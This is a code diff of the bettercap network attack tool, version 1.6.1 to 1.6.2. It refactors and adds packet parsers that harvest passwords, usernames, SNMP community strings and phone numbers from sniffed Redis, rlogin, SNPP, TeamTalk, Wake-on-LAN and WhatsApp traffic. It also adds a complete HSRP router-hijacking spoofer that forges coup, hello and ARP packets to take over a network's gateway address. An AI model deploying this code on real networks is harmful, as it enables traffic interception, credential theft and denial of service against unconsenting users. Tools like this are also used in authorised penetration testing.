bettercap 1.6.1 → 1.6.2

data/lib/bettercap/sniffer/parsers/redis.rb

@@ -7,6 +7,10 @@ Author : Simone 'evilsocket' Margaritelli
 Email  : evilsocket@gmail.com
 Blog   : https://www.evilsocket.net/
 
+Redis authentication parser:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
 This project is released under the GPL 3 license.
 
 =end
@@ -19,21 +23,19 @@ class Redis < Base
     @name = 'REDIS'
   end
   def on_packet( pkt )
-    begin
-      if pkt.tcp_dst == 6379
-        lines = pkt.to_s.split(/\r?\n/)
-        lines.each do |line|
-          if line =~ /config\s+set\s+requirepass\s+(.+)$/i
-            pass = "#{$1}"
-            StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
-          elsif line =~ /AUTH\s+(.+)$/i
-            pass = "#{$1}"
-            StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
-          end
-        end
+    return unless pkt.tcp_dst == 6379
+
+    lines = pkt.to_s.split(/\r?\n/)
+    lines.each do |line|
+      if line =~ /config\s+set\s+requirepass\s+(.+)$/i
+        pass = "#{$1}"
+        StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
+      elsif line =~ /AUTH\s+(.+)$/i
+        pass = "#{$1}"
+        StreamLogger.log_raw( pkt, @name, "password=#{pass}" )
       end
-    rescue
     end
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/rlogin.rb

@@ -7,6 +7,10 @@ Author : Simone 'evilsocket' Margaritelli
 Email  : evilsocket@gmail.com
 Blog   : https://www.evilsocket.net/
 
+BSD rlogin authentication parser:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
 This project is released under the GPL 3 license.
 
 =end
@@ -19,27 +23,24 @@ class Rlogin < Base
     @name = 'RLOGIN'
   end
   def on_packet( pkt )
-    begin
-      if pkt.tcp_dst == 513
-        # rlogin packet data = 0x00[client-username]0x00<server-username>0x00<terminal/speed>0x00
+    return unless pkt.tcp_dst == 513
+    # rlogin packet data = 0x00[client-username]0x00<server-username>0x00<terminal/speed>0x00
 
-        # if client username, server username and terminal/speed were supplied...
-        # regex starts at client username as the first null byte is stripped from pkt.payload.to_s
-        if pkt.payload.to_s =~ /\A([a-z0-9_-]+)\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
-          client_user = $1
-          server_user = $2
-          terminal = $3
-          StreamLogger.log_raw( pkt, @name, "client-username=#{client_user} server-username=#{server_user} terminal=#{terminal}" )
-        # else, if only server username and terminal/speed were supplied...
-        # regex starts at 0x00 as the first null byte is stripped from pkt.payload.to_s and the client username is empty
-        elsif pkt.payload.to_s =~ /\A\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
-          server_user = $1
-          terminal = $2
-          StreamLogger.log_raw( pkt, @name, "server-username=#{server_user} terminal=#{terminal}" )
-        end
-      end
-    rescue
+    # if client username, server username and terminal/speed were supplied...
+    # regex starts at client username as the first null byte is stripped from pkt.payload.to_s
+    if pkt.payload.to_s =~ /\A([a-z0-9_-]+)\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
+      client_user = $1
+      server_user = $2
+      terminal = $3
+      StreamLogger.log_raw( pkt, @name, "client-username=#{client_user} server-username=#{server_user} terminal=#{terminal}" )
+    # else, if only server username and terminal/speed were supplied...
+    # regex starts at 0x00 as the first null byte is stripped from pkt.payload.to_s and the client username is empty
+    elsif pkt.payload.to_s =~ /\A\x00([a-z0-9_-]+)\x00([a-z0-9_-]+\/[0-9]+)\x00\Z/i
+      server_user = $1
+      terminal = $2
+      StreamLogger.log_raw( pkt, @name, "server-username=#{server_user} terminal=#{terminal}" )
     end
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/snmp.rb

@@ -22,23 +22,22 @@ module Parsers
 # SNMP community string parser.
 class SNMP < Base
   def on_packet( pkt )
-    begin
-      if pkt.udp_dst == 161
-
-        packet = Network::Protos::SNMP::Packet.parse( pkt.payload )
-        unless packet.nil?
-        	if packet.snmp_version_number.to_i == 0
-        	  snmp_version = 'v1'
-        	else
-        	  snmp_version = 'n/a'
-        	end
-
-          msg = "[#{'Version:'.green} #{snmp_version}] [#{'Community:'.green} #{packet.snmp_community_string.map { |x| x.chr }.join.yellow}]"
-
-          StreamLogger.log_raw( pkt, 'SNMP', msg )
-        end
-      end
-    rescue; end
+    return unless pkt.udp_dst == 161
+
+    packet = Network::Protos::SNMP::Packet.parse( pkt.payload )
+
+    return if packet.nil?
+
+    if packet.snmp_version_number.to_i == 0
+      snmp_version = 'v1'
+    else
+      snmp_version = 'n/a'
+    end
+
+    msg = "[#{'Version:'.green} #{snmp_version}] [#{'Community:'.green} #{packet.snmp_community_string.map { |x| x.chr }.join.yellow}]"
+
+    StreamLogger.log_raw( pkt, 'SNMP', msg )
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/snpp.rb

@@ -7,6 +7,10 @@ Author : Simone 'evilsocket' Margaritelli
 Email  : evilsocket@gmail.com
 Blog   : https://www.evilsocket.net/
 
+Simple Network Paging Protocol (SNPP) authentication parser:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
 This project is released under the GPL 3 license.
 
 =end
@@ -19,19 +23,17 @@ class Snpp < Base
     @name = 'SNPP'
   end
   def on_packet( pkt )
-    begin
-      if pkt.tcp_dst == 444
-        lines = pkt.to_s.split(/\r?\n/)
-        lines.each do |line|
-          if line =~ /LOGIn\s+(.+)\s+(.+)$/
-            user = $1
-            pass = $2
-            StreamLogger.log_raw( pkt, @name, "username=#{user} password=#{pass}" )
-          end
-        end
+    return unless pkt.tcp_dst == 444
+
+    lines = pkt.to_s.split(/\r?\n/)
+    lines.each do |line|
+      if line =~ /LOGIn\s+(.+)\s+(.+)$/
+        user = $1
+        pass = $2
+        StreamLogger.log_raw( pkt, @name, "username=#{user} password=#{pass}" )
       end
-    rescue
     end
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/teamtalk.rb

@@ -0,0 +1,41 @@
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+BearWare TeamTalk authentication parser:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+# BearWare TeamTalk authentication parser.
+class TeamTalk < Base
+  def initialize
+    @name = 'TeamTalk'
+  end
+  def on_packet( pkt )
+    return unless (pkt.tcp_dst == 10333 || pkt.udp_dst == 10333)
+
+    lines = pkt.to_s.split(/\r?\n/)
+    lines.each do |line|
+      next unless (line =~ /login\s+/ && line =~ /username=/ && line =~ /password=/)
+
+      version = line.scan(/version="?([\d\.]+)"?\s/).flatten.first
+      user = line.scan(/username="?(.*?)"?\s/).flatten.first
+      pass = line.scan(/password="?(.*?)"?\s/).flatten.first
+
+      StreamLogger.log_raw( pkt, @name, "#{'version'.blue}=#{version} username=#{user} password=#{pass}" )
+    end
+  rescue
+  end
+end
+end
+end

data/lib/bettercap/sniffer/parsers/teamviewer.rb

@@ -16,14 +16,14 @@ module Parsers
 # MySQL authentication parser.
 class TeamViewer < Base
   def on_packet( pkt )
-    begin
-      if pkt.tcp_dst == 5938 or pkt.tcp_src == 5938
-        packet = Network::Protos::TeamViewer::Packet.parse( pkt.payload )
-        unless packet.nil?
-          StreamLogger.log_raw( pkt, 'TEAMVIEWER', "#{'version'.blue}=#{packet.version.yellow} #{'command'.blue}=#{packet.command.yellow}"  )
-        end
-      end
-    rescue; end
+    return unless (pkt.tcp_dst == 5938 || pkt.tcp_src == 5938)
+
+    packet = Network::Protos::TeamViewer::Packet.parse( pkt.payload )
+
+    return if packet.nil?
+
+    StreamLogger.log_raw( pkt, 'TEAMVIEWER', "#{'version'.blue}=#{packet.version.yellow} #{'command'.blue}=#{packet.command.yellow}"  )
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/url.rb

@@ -17,12 +17,12 @@ module Parsers
 class Url < Base
   def on_packet( pkt )
     s = pkt.to_s
-    if s =~ /GET\s+([^\s]+)\s+HTTP.+Host:\s+([^\s]+).+/m
-      host = $2
-      url = $1
-      unless url =~ /.+\.(png|jpg|jpeg|bmp|gif|img|ttf|woff|css|js).*/i
-        StreamLogger.log_raw( pkt, 'GET', "http://#{host}#{url}" )
-      end
+    return unless s =~ /GET\s+([^\s]+)\s+HTTP.+Host:\s+([^\s]+).+/m
+
+    host = $2
+    url = $1
+    unless url =~ /.+\.(png|jpg|jpeg|bmp|gif|img|ttf|woff|css|js).*/i
+      StreamLogger.log_raw( pkt, 'GET', "http://#{host}#{url}" )
     end
   end
 end

data/lib/bettercap/sniffer/parsers/whatsapp.rb

@@ -20,13 +20,12 @@ module Parsers
 # WhatsApp traffic parser.
 class Whatsapp < Base
   def on_packet( pkt )
-    begin
-      if ( pkt.tcp_dst == 443 or pkt.tcp_dst == 5222 or pkt.tcp_dst == 5223 ) and pkt.payload =~ /^WA.*?([a-zA-Z\-\.0-9]+).*?([0-9]+)/
-        version = $1
-        phone = $2
-        StreamLogger.log_raw( pkt, 'WHATSAPP', "#{'phone'.green}=#{phone.yellow} #{'version'.green}=#{version.yellow}" )
-      end
-    rescue; end
+    if ( pkt.tcp_dst == 443 or pkt.tcp_dst == 5222 or pkt.tcp_dst == 5223 ) and pkt.payload =~ /^WA.*?([a-zA-Z\-\.0-9]+).*?([0-9]+)/
+      version = $1
+      phone = $2
+      StreamLogger.log_raw( pkt, 'WHATSAPP', "#{'phone'.green}=#{phone.yellow} #{'version'.green}=#{version.yellow}" )
+    end
+  rescue
   end
 end
 end

data/lib/bettercap/sniffer/parsers/wol.rb

@@ -0,0 +1,68 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+Wake-on-LAN packet and authentication parser:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Parsers
+#
+# Wake-on-LAN packet and authentication parser.
+#
+# Supports WOL on UDP ports 0, 7 and 9
+# Does not support ether-wake which uses Ethertype 0x0842
+#
+# References:
+# - https://en.wikipedia.org/wiki/Wake-on-LAN
+# - https://wiki.wireshark.org/WakeOnLAN
+#
+class Wol < Base
+  def initialize
+    @name = 'WOL'
+  end
+
+  def on_packet( pkt )
+    return unless is_wol? pkt
+
+    # Split packet into chunks of 6 bytes each.
+    data = pkt.payload.to_s.unpack('H*').first.chars.each_slice(12).map(&:join)
+
+    # The Synchronization Stream field is 6 bytes of FF
+    # sync_stream = data[0]
+
+    # The Target MAC block contains the target's MAC address
+    # repeated 16 times (96 bytes)
+    return unless data[1..16].uniq.size == 1
+
+    # Format MAC address for output
+    mac = data[1].upcase.scan(/\w{2}/).join(':')
+
+    # The Password field is optional (0, 4 or 6 bytes).
+    password = data[17] || 'none'
+
+    StreamLogger.log_raw( pkt, @name, "#{'mac'.blue}=#{mac} #{'password'.blue}=#{password}" )
+  rescue
+  end
+
+  private
+
+  def is_wol?(pkt)
+    return ( pkt.eth2s(:dst) == 'FF:FF:FF:FF:FF:FF' && pkt.ip_daddr == '255.255.255.255' && \
+             pkt.respond_to?('udp_dst') && (pkt.udp_dst == 0 || pkt.udp_dst == 7 || pkt.udp_dst == 9) && \
+             (pkt.payload.size == 102 || pkt.payload.size == 106 || pkt.payload.size == 108) && \
+             pkt.payload.to_s.unpack('H*').first.start_with?('ffffffffffff') )
+  end
+end
+end
+end

data/lib/bettercap/spoofers/arp.rb

@@ -95,11 +95,11 @@ class Arp < Base
   # restore its ARP cache instead.
   def spoof( target, restore = false )
     if restore
-      send_spoofed_packet( @ctx.gateway.ip, @ctx.gateway.mac, target.ip, 'ff:ff:ff:ff:ff:ff' )
-      send_spoofed_packet( target.ip, target.mac, @ctx.gateway.ip, 'ff:ff:ff:ff:ff:ff' ) unless @ctx.options.spoof.half_duplex
+      send_spoofed_packet( @ctx.gateway.ip, @ctx.gateway.mac, target.ip, target.mac )
+      send_spoofed_packet( target.ip, target.mac, @ctx.gateway.ip, @ctx.gateway.mac ) unless @ctx.options.spoof.half_duplex
       @ctx.targets.each do |e|
         if e.spoofable? and e.ip != target.ip and e.ip != @ctx.gateway.ip
-          send_spoofed_packet( e.ip, e.mac, target.ip, 'ff:ff:ff:ff:ff:ff' )
+          send_spoofed_packet( e.ip, e.mac, target.ip, target.mac )
         end
       end
     else

data/lib/bettercap/spoofers/hsrp.rb

@@ -0,0 +1,351 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : https://www.evilsocket.net/
+
+Cisco Hot Standby Router Protocol (HSRP) spoofer:
+  Author : Brendan Coles
+  Email  : bcoles[at]gmail.com
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Spoofers
+#
+# This class is responsible for performing HSRP hijacking on the network.
+#
+# * Supports IPv4
+# * Supports text authentication
+# * Does not support IPv6
+# * Does not support MD5 authentication
+#
+# This spoofer watches incoming HSRP message broadcasts
+# looking for vulnerable HSRP groups using text authentication.
+#
+# If such a group is identified, the spoofer launches a coup against
+# the active router, advising the group that the +ctx+ interface wishes
+# to become the active router for the group's virtual IP address.
+#
+# The spoofer then proves the +ctx+ interface is the superior router
+# by sending a 'Hello' packet with the highest possible priority,
+# winning the election, and causing the the other routers participating
+# in the group to stand down, falling back to StandBy or Listen modes.
+#
+# As a result, the group members will no longer reply to ARP queries
+# for the group's virtual IP address.
+#
+# The 'Hello' packet is then re-broadcast periodically to ensure the
+# group members comply with the new doctrine.
+#
+# A gratuitous ARP reply is broadcast, notifying the network of the
+# new MAC address for the virtual IP address.
+#
+# The spoofer then adds the group's details to a list of controlled
+# groups, and replies to any ARP queries for their associated virtual
+# IP addresses.
+#
+# Upon termination of the spoofer, a 'Resign' packet is broadcast,
+# at which time the group member in StandBy mode should resume the
+# active role.
+#
+# Note: If the active router in the group already has the highest
+#       possible priority, the spoofer will wait until a lower
+#       priority router is elected as the active router.
+#
+# Note: If something goes wrong, the spoofer will likely cause a
+#       denial of service until a member of the group assumes the
+#       the role of active router, and the group's clients retrieve
+#       a fresh ARP lease for the virtual IP address.
+#
+# References:
+# - https://www.ietf.org/rfc/rfc2281.txt
+# - http://packetlife.net/blog/2008/oct/27/hijacking-hsrp/
+#
+class Hsrp < Base
+  # Initialize the BetterCap::Spoofers::HSRP object.
+  def initialize
+    @ctx          = Context.get
+    @forwarding   = @ctx.firewall.forwarding_enabled?
+    @spoof_thread = nil
+    @hsrp_thread  = nil
+    @arp_thread   = nil
+    @running      = false
+
+    # HelloTime - Time (in seconds) between Hello messages
+    @hellotime = 3 # default
+
+    # HoldTime - Time (in seconds) for which the Hello message is valid
+    @holdtime = 255 # max
+
+    # Table of HSRP groups
+    @groups = []
+
+    update_gateway!
+  end
+
+  # Start the HSRP spoofing
+  def start
+    Logger.debug "Starting HSRP spoofer ..."
+
+    stop() if @running
+    @running = true
+
+    if @ctx.options.spoof.kill
+      Logger.warn 'Disabling packet forwarding.'
+      @ctx.firewall.enable_forwarding(false) if @forwarding
+    else
+      @ctx.firewall.enable_forwarding(true) unless @forwarding
+    end
+
+    @hsrp_thread = Thread.new { hsrp_watcher }
+    @arp_thread = Thread.new { arp_watcher }
+    @spoof_thread = Thread.new { hsrp_spoofer }
+  end
+
+  # Stop the HSRP spoofing and reset firewall state
+  def stop
+    raise 'HSRP spoofer is not running' unless @running
+
+    Logger.debug 'Stopping HSRP spoofer ...'
+
+    @running = false
+    begin
+      @spoof_thread.exit
+    rescue
+    end
+
+    # Send a few resign packets
+    @groups.each do |vip, group, password|
+      3.times do
+        send_resign vip, group, password
+      end
+    end
+
+    Logger.debug "Resetting packet forwarding to #{@forwarding} ..."
+
+    @ctx.firewall.enable_forwarding( @forwarding )
+  end
+
+  private
+
+  # Broadcast a HSRP Coup packet (OpCode 0x01)
+  def send_coup(vip, group, password)
+    Logger.debug "[#{'HSRP'.green}] Launching a coup in group '#{group}' for ownership of virtual IP #{vip.to_x} ..."
+    pkt = PacketFu::HSRPPacket.new
+    pkt.eth_saddr = @ctx.iface.mac
+    pkt.eth_daddr = '01:00:5e:00:00:02'
+    pkt.eth_proto = 0x0800
+
+    pkt.ip_saddr = @ctx.iface.ip
+    pkt.ip_daddr = '224.0.0.2'
+    pkt.ip_ttl   = 1
+    pkt.ip_recalc
+
+    pkt.udp_src = 1985
+    pkt.udp_dst = 1985
+
+    pkt.hsrp_opcode = 1     # Coup
+    pkt.hsrp_priority = 255 # Highest priority
+    pkt.hsrp_state = 16     # Active
+    pkt.hsrp_hellotime = @hellotime
+    pkt.hsrp_holdtime = @holdtime
+    pkt.hsrp_group = group
+    pkt.hsrp_password = password
+    pkt.hsrp_vip = vip.to_s
+
+    pkt.udp_recalc
+    pkt.ip_recalc
+    @ctx.packets.push(pkt)
+  end
+
+  # Broadcast a HSRP Hello packet (OpCode 0x00)
+  def send_hello(vip, group, password)
+    pkt = PacketFu::HSRPPacket.new
+    pkt.eth_saddr = @ctx.iface.mac
+    pkt.eth_daddr = '01:00:5e:00:00:02'
+    pkt.eth_proto = 0x0800
+
+    pkt.ip_saddr = @ctx.iface.ip
+    pkt.ip_daddr = '224.0.0.2'
+    pkt.ip_ttl   = 1
+    pkt.ip_recalc
+
+    pkt.udp_src = 1985
+    pkt.udp_dst = 1985
+
+    pkt.hsrp_opcode = 0     # Hello
+    pkt.hsrp_priority = 255 # Highest priority
+    pkt.hsrp_state = 16     # Active
+    pkt.hsrp_hellotime = @hellotime
+    pkt.hsrp_holdtime = @holdtime
+    pkt.hsrp_group = group
+    pkt.hsrp_password = password
+    pkt.hsrp_vip = vip.to_s
+
+    pkt.udp_recalc
+    pkt.ip_recalc
+    @ctx.packets.push(pkt)
+  end
+
+  # Broadcast a HSRP Resign packet (OpCode 0x02) with Listen state (0x02)
+  def send_resign(vip, group, password)
+    Logger.debug "[#{'HSRP'.green}] Resigning position as active router for group '#{group}' (VirtualIP=#{vip.to_x}) ..."
+
+    pkt = PacketFu::HSRPPacket.new
+    pkt.eth_saddr = @ctx.iface.mac
+    pkt.eth_daddr = '01:00:5e:00:00:02'
+    pkt.eth_proto = 0x0800
+
+    pkt.ip_saddr = @ctx.iface.ip
+    pkt.ip_daddr = '224.0.0.2'
+    pkt.ip_ttl   = 1
+    pkt.ip_recalc
+
+    pkt.udp_src = 1985
+    pkt.udp_dst = 1985
+
+    pkt.hsrp_opcode = 2     # Resign
+    pkt.hsrp_priority = 255 # Highest priority
+    pkt.hsrp_state = 2      # Listen
+    pkt.hsrp_hellotime = @hellotime
+    pkt.hsrp_holdtime = @holdtime
+    pkt.hsrp_group = group
+    pkt.hsrp_password = password
+    pkt.hsrp_vip = vip.to_s
+
+    pkt.udp_recalc
+    pkt.ip_recalc
+    @ctx.packets.push(pkt)
+  end
+
+  private
+
+  # Main spoofer loop.
+  def hsrp_spoofer
+    while true
+      unless @groups.empty?
+        Logger.debug "[#{'HSRP'.green}] Sending HSRP 'Hello' broadcast to #{@groups.size} HSRP groups ..."
+      end
+
+      @groups.each do |vip, group, password|
+        send_hello vip, group, password
+      end
+
+      sleep @hellotime
+    end
+  end
+
+  # Watches for incoming HSRP messages with text authentication.
+  #
+  # If text authentication is identified, launches a coup
+  # against the active router in the HSRP group and claims the
+  # role of the active router.
+  def hsrp_watcher
+    Logger.debug 'HSRP watcher started ...'
+
+    sniff_packets('udp and port 1985') do |pkt|
+      # We're only interested in HSRP 'Hello' packets (OpCode 0x00) from other hosts
+      next unless (pkt.is_hsrp? && pkt.hsrp_opcode == 0 && pkt.ip_saddr.to_s != @ctx.iface.ip)
+
+      vip      = pkt.hsrp_vip
+      group    = pkt.hsrp_group
+      password = pkt.hsrp_password
+
+      # Ignore this message if we're already the active router for the group
+      next if @groups.include? [vip, group, password]
+
+      Logger.debug "[#{'HSRP'.green}] Received 'Hello' from #{pkt.ip_saddr.to_s} in group '#{group}' using text authentication (VirtualIP=#{vip.to_x} Group=#{group} Password=#{password})"
+
+      # Dump the packet for debugging purposes
+      #Logger.debug pkt.inspect
+
+      # Do not proceed if the active router has the highest possible priority
+      if pkt.hsrp_priority >= 255
+        Logger.debug "[#{'HSRP'.green}] Cannot overthrow #{pkt.ip_saddr.to_s} - priority 255 is too high. Ignoring ..."
+        next
+      end
+
+      # Let the user know the coup has begun
+      Logger.info "[#{'HSRP'.green}] #{"Claiming role as active router for group '#{group}' ...".yellow}"
+
+      # Overthrow the active router for the HSRP group
+      send_coup vip, group, password
+
+      # Broadcast a gratuitous ARP reply notifying the network
+      # of the new MAC address for the virtual IP address
+      Logger.info "[#{'ARP'.green}] #{"Broadcasting MAC #{@ctx.iface.mac} for virtual IP #{vip.to_x} ...".yellow}"
+      send_arp_reply vip.to_x, @ctx.iface.mac, vip.to_x, 'FF:FF:FF:FF:FF:FF'
+
+      # Add the HSRP group to the list of groups under our control
+      @groups << [vip, group, password]
+    end
+  end
+
+  # Watches for incoming ARP queries
+  #
+  # If the query is for a HSRP virtual IP address
+  # under our control, replies with +ctx+ interface.
+  def arp_watcher
+    Logger.debug 'HSRP ARP watcher started ...'
+
+    sniff_packets('arp') do |pkt|
+      # We're only interested in ARP queries from other hosts
+      next unless is_arp_query?(pkt)
+
+      saddr = pkt.arp_src_ip.to_s
+      daddr = pkt.arp_dst_ip.to_s
+      smac  = pkt.arp_src_mac.to_s
+
+      Logger.info "[#{'ARP'.green}] #{saddr} is asking who #{daddr} is."
+
+      # The client wants to know who we are...
+      # Send an ARP reply telling the client our MAC
+      if pkt.arp_dst_ip.to_s == @ctx.iface.ip
+        send_arp_reply @ctx.iface.ip, @ctx.iface.mac, saddr, smac
+        next
+      end
+
+      # The client wants to know who someone else is...
+      @groups.each do |group|
+        # Are they looking for one of the virtual IP addresses we control?
+        if group.include? daddr
+          # Yes - Send an ARP reply claiming to be the owner of the virtual IP
+          send_arp_reply daddr, @ctx.iface.mac, saddr, smac
+        end
+      end
+    end
+  end
+
+  # Send an ARP reply to the target identified by the +daddr+ IP address
+  # and +dmac+ MAC address.
+  def send_arp_reply(saddr, smac, daddr, dmac)
+    pkt = PacketFu::ARPPacket.new
+    pkt.eth_saddr = smac
+    pkt.eth_daddr = dmac
+    pkt.arp_saddr_mac = smac
+    pkt.arp_daddr_mac = dmac
+    pkt.arp_saddr_ip = saddr
+    pkt.arp_daddr_ip = daddr
+    pkt.arp_opcode = 2
+
+    @ctx.packets.push(pkt)
+  end
+
+  # Return true if the +pkt+ packet is an ARP 'who-has' query
+  def is_arp_query?(pkt)
+    # we're only interested in 'who-has' packets from other hosts
+    return ( pkt.arp_opcode == 1 && \
+             pkt.arp_dst_mac.to_s == '00:00:00:00:00:00' && \
+             pkt.arp_src_ip.to_s != @ctx.iface.ip )
+  rescue
+    false
+  end
+end
+end
+end